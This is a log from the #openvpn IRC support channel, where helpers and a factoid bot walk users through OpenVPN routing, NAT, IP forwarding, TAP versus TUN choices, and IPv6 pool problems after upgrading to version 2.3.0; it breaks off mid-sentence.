10:19 < Alanonzander> elsewhere 10:19 <@ecrist> so, you need to first setup a VPN (don't worry about sending traffic to/from anywhere yet) 10:19 <@ecrist> start there, let me know when that's done 10:19 < Alanonzander> I ahve done that 10:20 <@ecrist> !configs 10:20 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 10:20 < Alanonzander> The VPN works for client-to-client connections now. 10:21 <@ecrist> ok, so you need to add that special IP to your server config in a push "route..." line 10:21 <@ecrist> and configure the vpn server to nat traffic going out to that IP properly 10:22 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 252 seconds] 10:22 -!- master_of_master [~master_of@p57B521B9.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 10:22 < Alanonzander> Examples? 10:22 <@ecrist> !man 10:22 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 10:23 <+pekster> Orbi: you asked about redirection: see this for info: 10:23 <+pekster> !redirect 10:23 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. 
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 10:23 <@vpnHelper> http://ircpimps.org/redirect.png 10:24 -!- master_of_master [~master_of@p57B54C0D.dip.t-dialin.net] has joined #openvpn 10:24 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 10:25 < Alanonzander> ecrist, everything you have pointed me to only serves to confuse me more. 10:26 < Alanonzander> please assume I know NOTHING about networking 10:26 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds] 10:29 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 252 seconds] 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:35 <@ecrist> Alanonzander: we're not here to teach you networking 10:35 <@ecrist> !101 10:35 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 10:36 -!- AsadH is now known as zz_AsadH 10:36 < |Mike|> nice one 10:37 < Alanonzander> Not asking for that, asking for EXAMPLES. So much for this being a place to get help. 10:37 -!- Alanonzander [~azander@209.124.51.200] has quit [Quit: Leaving] 10:37 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 10:37 -!- mode/#openvpn [+b *!*@209.124.51.200] by ecrist 10:38 < Rienzilla> lol 10:39 < gladiatr> oo... shiny 10:41 < Orbi> !def1 10:41 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. 
or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 10:41 <+pekster> Orbi: Ask questions in the channel, since I'm not your personal paid support 10:42 <+pekster> That said, the client can add 'redirect-gateway' values to its own config; the client LAN won't be visible to the server or any networks behind it, so you'd need NAT to support local systems behind a VPN peer acting as a client 10:43 < Orbi> !ipforward 10:43 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward 10:43 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 10:43 < Orbi> !linipforward 10:43 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 10:43 <@ecrist> !factoids 10:43 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 10:46 <+pekster> Orbi: Really? Come on, no more PMs for conversation that obviously belongs in the channel. Last warning before I stop caring about your questions completely. Did you read the flowchart you were linked via the !redirect bot message? That's all stuff you do client side, not server-side 10:47 <+pekster> You can push it from the server, but you're not required to. See the 2nd flowchart box specifically 10:49 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:49 < Orbi> @pekster got it 10:49 < Orbi> !man 10:49 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 
10:50 < Orbi> !nat 10:50 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 10:50 < Orbi> !linnat 10:50 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 10:50 <+pekster> All the flowcharts the bot has were written in such a way that they cover each step you need to take, in order, to accomplish your task 10:51 <+pekster> You probably have your NAT worked out with the -j MASQUERADE for traffic goign out your tun interface in your netfilter/iptables rules. But you shouldn't worry about that if you're trying to redirect the gateway, since you need *that* working before you can worry about NAT. 
Just follow the flowchart, and don't skip steps 10:52 -!- dazo is now known as dazo_afk 10:53 -!- b1rkh0ff [~b1rkh0ff@178.77.6.46] has quit [Read error: Connection reset by peer] 10:56 -!- Orbi [~opera@anon-149-38.vpn.ipredator.se] has quit [Ping timeout: 256 seconds] 10:57 -!- Orbi [~opera@56.52-65-87.adsl-dyn.isp.belgacom.be] has joined #openvpn 11:02 -!- Orbi [~opera@56.52-65-87.adsl-dyn.isp.belgacom.be] has quit [Ping timeout: 272 seconds] 11:03 -!- Orbi [~opera@anon-184-31.vpn.ipredator.se] has joined #openvpn 11:03 -!- raidz_away is now known as raidz 11:04 < Orbi> I enabled redirect-gateway def1 11:04 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 252 seconds] 11:04 -!- pelle2_ is now known as pelle2 11:04 < Orbi> I went through all the steps 11:05 < Orbi> !ipforward 11:05 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward 11:05 < Orbi> !linipforward 11:05 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 11:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:08 < Orbi> probably a dumb question, but just to be sure: I followed the flowchart all the way to "It Works!" 11:08 < Orbi> does that mean that IP forward is enabled? 
11:09 <+pekster> Yes; routers don't work unless they are forwarding IP packets 11:09 < Orbi> so I don't need this rule: iptables -I FORWARD -i tun+ -j ACCEPT 11:10 <+pekster> Maybe not; the preferred way to accept traffic from potentially unkonwn sources is to use stateful firewall rules 11:11 <+pekster> -i $some_external_facing_interface --state ESTABLISHED,RELATED -j ACCEPT 11:11 <+pekster> or such 11:11 < Orbi> Everything works without that rule, so better to leave it so 11:11 <+pekster> You might benefit from some basic tcp/ip reading: 11:11 <+pekster> !tcpip 11:11 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 11:12 < Orbi> yes, I certainly could 11:12 <+pekster> Higher level features like VPN operation is going to be very hard if you don't have a good handle on the basics 11:12 < Orbi> thanks for the tip and your helpful support. I'm going to read that. 11:15 < Orbi> is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf still active? 11:16 < Orbi> nevermind, opera does not want to open it. 11:17 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 11:26 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 255 seconds] 11:29 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 11:32 < Orbi> I'm confused, should I use: iptables -t filter -A lan2wan -i br0 -o tun0 -j ACCEPT or 11:32 < Orbi> iptables filter -A lan2wan -i br0 -o tun0 -j ACCEPT ? 
11:34 <+pekster> -t filter, or leave it off because filter is the default table 11:34 <+pekster> See the iptables manpage for usage details 11:35 < Orbi> yes, I was reading that, that's why I was asking :) 11:40 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:40 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:40 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:40 -!- Orbi [~opera@anon-184-31.vpn.ipredator.se] has quit [Ping timeout: 264 seconds] 11:41 -!- Orbi [~opera@anon-149-224.vpn.ipredator.se] has joined #openvpn 11:45 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 11:46 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 11:46 -!- Orbi [~opera@anon-149-224.vpn.ipredator.se] has quit [Ping timeout: 252 seconds] 11:47 -!- Lord-M [~LordM@ip-80-113-202-148.ip.prioritytelecom.net] has joined #openvpn 11:47 < Lord-M> Anybody around who can help me with an issue I'm having after upgrading from OpenVPN 2.2.2 to 2.3.0 (on Windows)? 11:48 -!- Orbi [~opera@109.129.27.94] has joined #openvpn 11:50 <+pekster> Lord-M: What specifically are you having problems with after the upgrade? Is everything else (config files, any scripts, ccd setup, etc all the same too?) 11:50 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 11:51 < Lord-M> TAP adapter is not getting a default gateway anymore (connection works just fine, configuration files unchanged) 11:52 <+pekster> Can you try deleting all tap adapters and creating a new one? 
The 'delalltap.bat' script is no longer installed by default, but just re-install the 'tap-windows.exe' program from your \bin\ directory and you'll get it back 11:52 -!- zz_AsadH is now known as AsadH 11:52 < Lord-M> I'll give it a try 11:52 <+pekster> It'll be under a separate programs directory called 'TAP-Win32' (or a similar name, but it begins with TAP) 11:55 -!- AsadH is now known as zz_AsadH 11:57 < Lord-M> removed and reinstalled, doesn't appear to make a difference... 11:57 < Lord-M> did anything change with respect to the handling of the default gateway in a bridged setup? 11:58 <+pekster> What's delivering the gateway? OpenVPN, or an actual DHCP server at the remote end attached to the bridge? 11:58 < Lord-M> DHCP server at the other end 11:58 < Lord-M> I see a lot of "Mon Jan 14 18:57:48 2013 Extracted DHCP router address: 192.168.xx.x" in the log 11:59 < Lord-M> but it doesn't appear to get picked up on the client side 12:01 <+pekster> I'm not aware that anything changed, although I'm not sure what OpenVPN would be caring about the dhcp traffic since my understanding was that was left to the tap driver in a bridged setup like that 12:03 <+pekster> Lord-M: Try adding a --route-delay option perhaps? 12:03 < Lord-M> Tried that, that's actually where the fun starts... ;) 12:03 <+pekster> :\ 12:03 < Lord-M> :P 12:04 < Lord-M> I've been trying to get it to set "route 0.0.0.0 0.0.0.0" with the default gateway set through DHCP using "route-gateway" 12:04 < Lord-M> using a route-delay of 10 seconds to ensure it's available 12:04 < Lord-M> when I try that, OpenVPN seems to ignore the delay... 
12:05 < Lord-M> when I manually do ""route 0.0.0.0 0.0.0.0 192.168.x.x" everything works just fine 12:05 <+pekster> I've generally found the 'tap-delay' parameter to give better results under most Windows platforms 12:05 < Lord-M> ah k, I'll give that one a try 12:05 <+pekster> My "usual" make Windows suck-less options tend to be: --ip-win32 dynamic --route-method exe --tap-sleep 5 12:05 <+pekster> Sometimes I'll use the value of 10 instead 12:05 <+pekster> Sometimes I mix it up, but for some reason I keep coming back to that magic set of options 12:06 <+pekster> Take it with a grain of salt, since I don't do much with tap (now and then, but not often) 12:08 <+pekster> Oh, I guess --ip-win32 is worthless for you (that's only interesting if using ifconfig to se the IP, otherwise it won't help) 12:08 < Lord-M> nope, sadly doesn't make a difference... The "route 0.0.0.0 0.0.0.0" statement gets executed before delay (both route-delay, or tap-sleep) 12:08 < Lord-M> when I change the statement in "route 0.0.0.0 0.0.0.0 192.168.x.x" it takes the delay into account :| 12:09 <+pekster> The only other interesting Windows-specific option that might do some good would be --dhcp-renew to get it to "re-renew" in case something got messed up the first time it did a DHCP DISCOVER call 12:10 < Lord-M> tried that, also doesn't work (did work with 2.2.2 though) 12:10 <+pekster> I'm not really feeling great about that fixing things (the docs seem to suggest it's not useful when you already get a normal discovery process) 12:10 <+pekster> Ugh 12:10 < Lord-M> what does solve the problem is "redirect-gateway" 12:11 < Lord-M> both that completely kills the existing gateway (which is not what I'm after) 12:11 < Lord-M> that again is solved by doing a full "ipconfig /refresh" after OpenVPN gets connected (so my previous default gateway is restorted *and* that TAP adapter hangs on to its own default gateway) 12:11 < Lord-M> but that is problematic as it gets screwed up again if OpenVPN 
reconnects at some point... 12:12 < Lord-M> *both = but 12:12 <+pekster> I suppose you need tap verses a tun setup if you're going through all this trouble? 12:12 <+pekster> tun makes things a lot cleaner :P 12:13 < Lord-M> honestly never tried ;) TAP always worked for me, but I'll have a look at a TUN setup... Will that still work with bridging, etc? 12:13 <+pekster> No, it's a routed setup, not bridged 12:14 <+pekster> And because of that it's a lot less moving parts to break (plus less wasted bandwidth) 12:14 <+pekster> !tunortap 12:14 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 12:14 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 12:14 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:14 <+pekster> Really, unless you are actually transmitting Ethernet frames or require real broadcast support, you don't want/need tap 12:14 < Lord-M> ok 12:15 < Lord-M> and basically the only change is that I need OpenVPN to push a couple of routes through to the client? 12:15 <+pekster> Yea, and your server-side network to be made aware how to route back to the VPN LAN 12:15 <+pekster> In a corporate environment you just add routes to the corporate routers to send traffic to the VPN server 12:16 < Lord-M> kk... I think I've done this before (running DD-WRT) 12:16 < Lord-M> perhaps a (final) stupid question: But what would I need real broadcast support for? 12:16 <+pekster> Multicast, or some programs (eg: games doing a LAN broadcast to find other game hosts on the network) 12:17 < Lord-M> ok, well then, I'll give the TUN setup a try... Thanks a lot! 
12:17 <+pekster> Some "auto-discovery" protocols like to use broadcasts to announce themselves (eg: uPnP) 12:17 <+pekster> Yup. Most people don't need broadcast support, or have ways around them for VPN users 12:18 <+pekster> Good luck, and despite the effort switching your working 2.2.x setup over, I suspect you'll be happier in the end with a less complex setup 12:18 < Lord-M> I'm basically using it for some SMB shares, so that shouldn't be a problem 12:22 -!- Orbi [~opera@109.129.27.94] has quit [Ping timeout: 248 seconds] 12:25 -!- Orbi [~opera@anon-149-10.vpn.ipredator.se] has joined #openvpn 12:28 -!- Lord-M [~LordM@ip-80-113-202-148.ip.prioritytelecom.net] has quit [Quit: Cheers!] 12:29 -!- Orbi [~opera@anon-149-10.vpn.ipredator.se] has quit [Ping timeout: 248 seconds] 12:39 -!- Orbi [~opera@anon-185-46.vpn.ipredator.se] has joined #openvpn 13:12 < Orbi> I'm getting this error 6 times after "Initialization Sequence Completed": write UDPv4 [EMSGSIZE Path-MTU=1492]: Message too long (code=97) 13:12 < Orbi> What does it mean? 13:17 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 13:17 < WhoNeedszzz> Hey guys 13:17 < WhoNeedszzz> I just updated to 2.3.0 and now i'm getting this on my client: "Authenticate/Decrypt packet error: packet HMAC authentication failed" 13:17 < WhoNeedszzz> I haven't changed anything since running 2.3 rc2 13:18 < WhoNeedszzz> Is there a config difference? 13:19 -!- grimeton [~ruth@2a01:4f8:d12:c45:0:dead:beef:cafe] has joined #openvpn 13:19 < grimeton> is it possible to tell the daemon to use a different destination address on an udp tunnel without reestablishing the connection? 
13:24 <+pekster> grimeton: See --float in the manpage, although that only works if one end moves to a new source IP that the other peer can see 13:28 < WhoNeedszzz> here's my server and client configs: https://gist.github.com/eb730f60b24bea9b408a 13:28 <@vpnHelper> Title: gist:eb730f60b24bea9b408a (at gist.github.com) 13:28 < WhoNeedszzz> Everything worked with 2.3 rc2 13:31 < WhoNeedszzz> Anyone? 13:34 < grimeton> pekster: yeah, i know, that's NOT what i want 13:44 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Ping timeout: 246 seconds] 13:49 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 13:50 < WhoNeedszzz> Sorry net messed up. Did anyone respond? 13:50 < Orbi> @WhoNeedszzz not yet 13:52 -!- b1rkh0ff [~b1rkh0ff@178.77.8.47] has joined #openvpn 13:55 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Ping timeout: 244 seconds] 13:55 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 13:55 < WhoNeedszzz> I feel like it's a config change 13:55 < WhoNeedszzz> But i don't see any documentation for 2.3.9 13:55 < WhoNeedszzz> 2.3.0* 13:57 < Orbi> open your 2.3 rc2 and 2.3.0 configs in notepad++ and compare them for differences 14:00 < WhoNeedszzz> there is only one config 14:00 < WhoNeedszzz> I didn't change anything from 2.3 rc2 14:01 < WhoNeedszzz> Other than now adding tls-server and tls-client 14:01 < WhoNeedszzz> i'm saying are there differences that 2.3.0 expects that i'm not aware of 14:02 < WhoNeedszzz> i just wish i knew what route line it is referring to 14:03 < WhoNeedszzz> Perhaps this? /usr/sbin/ip route add 72.14.183.109/32 via 192.168.1.1 14:03 < WhoNeedszzz> Should it be /32? 
14:08 -!- Orbi [~opera@anon-185-46.vpn.ipredator.se] has quit [Ping timeout: 248 seconds] 14:13 -!- mattock_afk is now known as mattock 14:15 < plaisthos> WhoNeedszzz: there should not be any difference between rc2 and final in that area of code 14:16 -!- Orbi [~opera@109.129.44.7] has joined #openvpn 14:17 < plaisthos> there only two changes in rc2 to final, one does not affect linux and the other is related to push messages 14:20 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Ping timeout: 260 seconds] 14:20 -!- WhoNeedszzz [~WhoNeedsz@adsl-074-170-159-249.sip.msy.bellsouth.net] has joined #openvpn 14:20 -!- WhoNeedszzz [~WhoNeedsz@adsl-074-170-159-249.sip.msy.bellsouth.net] has quit [Changing host] 14:20 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 14:20 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Client Quit] 14:21 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 14:21 < WhoNeedszzz> so i'm curious then what's wrong 14:21 < WhoNeedszzz> if there aren't many changes 14:21 < WhoNeedszzz> since it worked fine in rc2 14:22 < plaisthos> it must be something different than rc2 vs final 14:22 < WhoNeedszzz> well i didn't change anything else 14:22 < WhoNeedszzz> the route also fails in windows if that helps 14:23 < WhoNeedszzz> did you look at my config i pasted earlier? 14:23 < plaisthos> route failure is also different from hmac fail 14:23 < WhoNeedszzz> i fixed the hmac issue 14:23 < WhoNeedszzz> just needed to add tls-server in server config and tls-client in client config 14:25 < WhoNeedszzz> It's definitely this line: ip route add 72.14.183.109/32 via 192.168.1.1 14:25 < plaisthos> WhoNeedszzz: on the client? 14:25 < WhoNeedszzz> yes 14:25 < WhoNeedszzz> if i enter the command manually i get: RTNETLINK answers: File exists 14:25 < plaisthos> what is the error? 14:25 < plaisthos> are you running two instances of openvpn? 
14:25 < WhoNeedszzz> no 14:26 < plaisthos> who does your routing table look (netstat -rn), is tehre already that route? 14:26 < WhoNeedszzz> hmm it is there 14:26 < WhoNeedszzz> odd 14:26 < WhoNeedszzz> so just delete it? 14:26 < plaisthos> yes 14:27 < plaisthos> may be a leftover from a previous try 14:29 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 14:29 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:30 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 14:30 < WhoNeedszzz> ok progress 14:30 < WhoNeedszzz> now no route error 14:30 < WhoNeedszzz> but i'm getting "ROUTE6: default_gateway=UNDEF" in client output 14:30 < plaisthos> WhoNeedszzz: sure :_ 14:31 < plaisthos> you don't use server-ipv6 14:31 < plaisthos> (or all options set by server-ipv6) 14:31 < plaisthos> or whatever the option is called 14:31 < WhoNeedszzz> hmm well when i use server-ipv6 the pool is configured wrong 14:32 < WhoNeedszzz> i didn't use server-ipv6 in rc2 and it worked fine 14:32 < thermoman> who to contact to get something added to the FAQ? (http://openvpn.net/index.php/open-source/faq/79-client/317-qmulti-bad-source-address-from-client--packet-droppedq-or-qget-inst-by-virt-failedq.html) 14:32 <@vpnHelper> Title: "MULTI: bad source address from client , packet dropped" or "GET INST BY VIRT: [failed]"? (at openvpn.net) 14:33 -!- Orbi [~opera@109.129.44.7] has quit [Ping timeout: 248 seconds] 14:35 < WhoNeedszzz> yeah it messes up the pool 14:35 < plaisthos> WhoNeedszzz: care to report the bug? 14:35 < WhoNeedszzz> it should be :7100, but it picks :8000 which is out of my range of addresses 14:35 < WhoNeedszzz> well it could be anywhere from :7000 to :7FFF 14:36 < WhoNeedszzz> but not :8000 14:36 < WhoNeedszzz> what line sets up the ipv6 gateway? 
14:36 -!- Orbi [~opera@anon-149-72.vpn.ipredator.se] has joined #openvpn 14:37 < Orbi> any clues as to these errors: "Initialization Sequence Completed": write UDPv4 [EMSGSIZE Path-MTU=1492]: Message too long (code=97) ? 14:38 < plaisthos> WhoNeedszzz: ifconfig6 line 14:38 < plaisthos> being pushed by the server 14:38 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 14:38 <+pekster> WhoNeedszzz: IIRC, you can't use OpenVPN with anything smaller than a /112 14:39 <+pekster> You should be allocated at *least* a /64 from any upstream provider 14:39 <+pekster> At least, any provider worth using 14:40 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 14:40 < WhoNeedszzz> i do have a /64 14:40 < WhoNeedszzz> 2600:3c00::21:7000/64 - 2600:3c00::21:7fff/64 14:40 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 14:41 <@ecrist> that looks like a /56 to me 14:41 < WhoNeedszzz> 2600:3c00 is linode 14:41 <+pekster> ecrist: that "range" he gave is both in the "same" /64 14:41 < plaisthos> ecrist: nah 14:41 <+pekster> Scrape off the bogus CIDR mask that I don't think he means and that's actually a /116 14:42 <+pekster> NOT a /112 14:42 <+pekster> ovpn can't with with a /116 14:42 < WhoNeedszzz> i'm pulling the info straight from my server's dashboard 14:42 < plaisthos> WhoNeedszzz: you need server-ipv6 to push the ifconfig and gateway to client iirc 14:42 < WhoNeedszzz> /64 14:42 <+pekster> WhoNeedszzz: You don't seem to understand how a /64 works. 
You'd get 2600:3c00:0:0:0:0:0:0 through 2600:3c00:0::ffff:ffff:ffff:ffff 14:42 <+pekster> That is a /64 14:42 <+pekster> Anything less than that range is not a /64 14:43 <+pekster> Sorry, missed a 0 in the 2nd output 14:43 <@ecrist> sorry, guys, I missed the short notation :: 14:43 * ecrist flogs himself appropriately 14:43 < plaisthos> I don't think that configuration ever worked 14:43 <+pekster> ecrist: np. ipv6 gets long (one of the obvious drawbacks) 14:43 < WhoNeedszzz> the range is 4096 addresses 14:43 < WhoNeedszzz> Surely that is enough 14:43 <@ecrist> WhoNeedszzz: you're fine 14:43 <+pekster> But he doesn't have a /112? 14:43 < WhoNeedszzz> so it looks like i need --route-ipv6 14:44 <+pekster> ecrist: Does 2.3.0 final support arbitrary CIDR masks? I'm still somehwat new to IPv6 support in ovpn, so maybe my info is old? 14:44 < plaisthos> pekster: it needs more than /112 14:44 <+pekster> If he really only has 2600:3c00::21:7000/116, can that be expressed? 14:44 <@ecrist> I'm not sure, pekster 14:44 < plaisthos> right 14:44 <@ecrist> I've only used it with a /64 14:45 < plaisthos> but I don't think he has only /112 14:45 <+pekster> Okay; he's described a /116 network. There's the "probloem" for getting a 2600:3c00::21:8xxx address 14:45 <+pekster> He's complaining that getting the .... :8xxx is the issue 14:45 < WhoNeedszzz> right 14:45 <+pekster> THat is *part* of a /112 14:45 < WhoNeedszzz> setting ipv6-pool manually works 14:45 < plaisthos> WhoNeedszzz: shouldn't 14:45 <+pekster> How do you not have that address if you have the *entire* /64 as you claim? 14:45 < plaisthos> what are you setting? 
14:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 14:46 < WhoNeedszzz> look at my config pasted 14:46 < plaisthos> WhoNeedszzz: ipv6-pool also add 0x1000 to the address 14:46 < WhoNeedszzz> that's what i did 14:46 < plaisthos> WhoNeedszzz: there is only xxxx 14:47 < plaisthos> no idea what /xx you specified 14:47 < WhoNeedszzz> here's my line: ifconfig-ipv6-pool 2600:3c00::21:7100 14:47 < WhoNeedszzz> that works 14:47 < WhoNeedszzz> it doesn't add 14:48 < WhoNeedszzz> what should route-ipv6 be? 14:48 < plaisthos> WhoNeedszzz: yes 14:48 -!- Orbi [~opera@anon-149-72.vpn.ipredator.se] has quit [Ping timeout: 248 seconds] 14:48 < plaisthos> it default to /64 14:48 < plaisthos> WhoNeedszzz: why do you assume that it does not add? 14:48 < WhoNeedszzz> because i looked at the output 14:48 < WhoNeedszzz> the address gets allocated properly 14:48 < WhoNeedszzz> i just need the route 14:48 < ngharo> WhoNeedszzz: here's my relavant bits for my working 2.3 ipv6 setup http://paste.debian.net/224676/ 14:48 < plaisthos> hm 14:49 < plaisthos> you seem to be right 14:49 < ngharo> i have 2001:1af8:4400:a049::/64 assigned to me 14:49 < plaisthos> misread the code 14:49 < ngharo> WhoNeedszzz: didn't we get this working before? :) 14:49 < WhoNeedszzz> we did 14:49 -!- Orbi [~opera@anon-184-62.vpn.ipredator.se] has joined #openvpn 14:49 < WhoNeedszzz> it doesn't work in 2.3.0 14:49 < WhoNeedszzz> and i didn't change anything 14:50 < WhoNeedszzz> but right i forgot i already have the push route-ipv6 14:50 < WhoNeedszzz> so why isn't the client getting it? 14:50 < WhoNeedszzz> what does the bypass-dhcp part do? 
14:50 < WhoNeedszzz> that's the only difference in our configs other than the manual allocating 14:51 < plaisthos> WhoNeedszzz: ngharo has also 112 14:52 < ngharo> can you repaste with your addresses shown 14:54 <@ecrist> !secret 14:54 <@vpnHelper> "secret" is funny that people use free programs, consult free help for them, run a business with them, but are restricted to say what they do. 14:54 <@ecrist> !topsecret 14:54 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust. 14:55 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Quit: Leaving] 14:55 < ngharo> :) 14:55 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 14:55 < WhoNeedszzz> sorry was testing vpn 14:55 < ngharo> ecrist: do you know where the windows NSI script is located in the source? 14:55 < WhoNeedszzz> ngharo, https://gist.github.com/853705caa977dc6a5a72 14:55 <@vpnHelper> Title: gist:853705caa977dc6a5a72 (at gist.github.com) 14:55 < WhoNeedszzz> which is what i had with rc2, but added tls-server and tls-client 14:56 < WhoNeedszzz> that config worked in rc3 14:56 < WhoNeedszzz> rc2* 14:56 <+pekster> Actually, I'm curious about the NSI location too, since I've been meaning to get around to submitting a patch to fix the awful lack of addtap.bat and deltapall.bat (I've had 3 people with issues becuase of that here, and that's the folks I've been able to help and seen) 14:57 < ngharo> I've got a couple people looking into building the visual studio project 14:57 < ngharo> but they're lazy hackers like myself :) 14:57 < ngharo> i highly doubt it'll spit out the NSI but who knows 14:57 <@ecrist> ngharo: no I do not, sorry 14:57 <+pekster> Well, the NSI "should" be provided since it's part of the installation of GPL software :\ 14:58 < ngharo> pekster: maybe we can create one 14:58 < ngharo> shouldnt be too difficult 14:58 <+pekster> It seems silly to me to take a GPL project and "hide" it behind a 
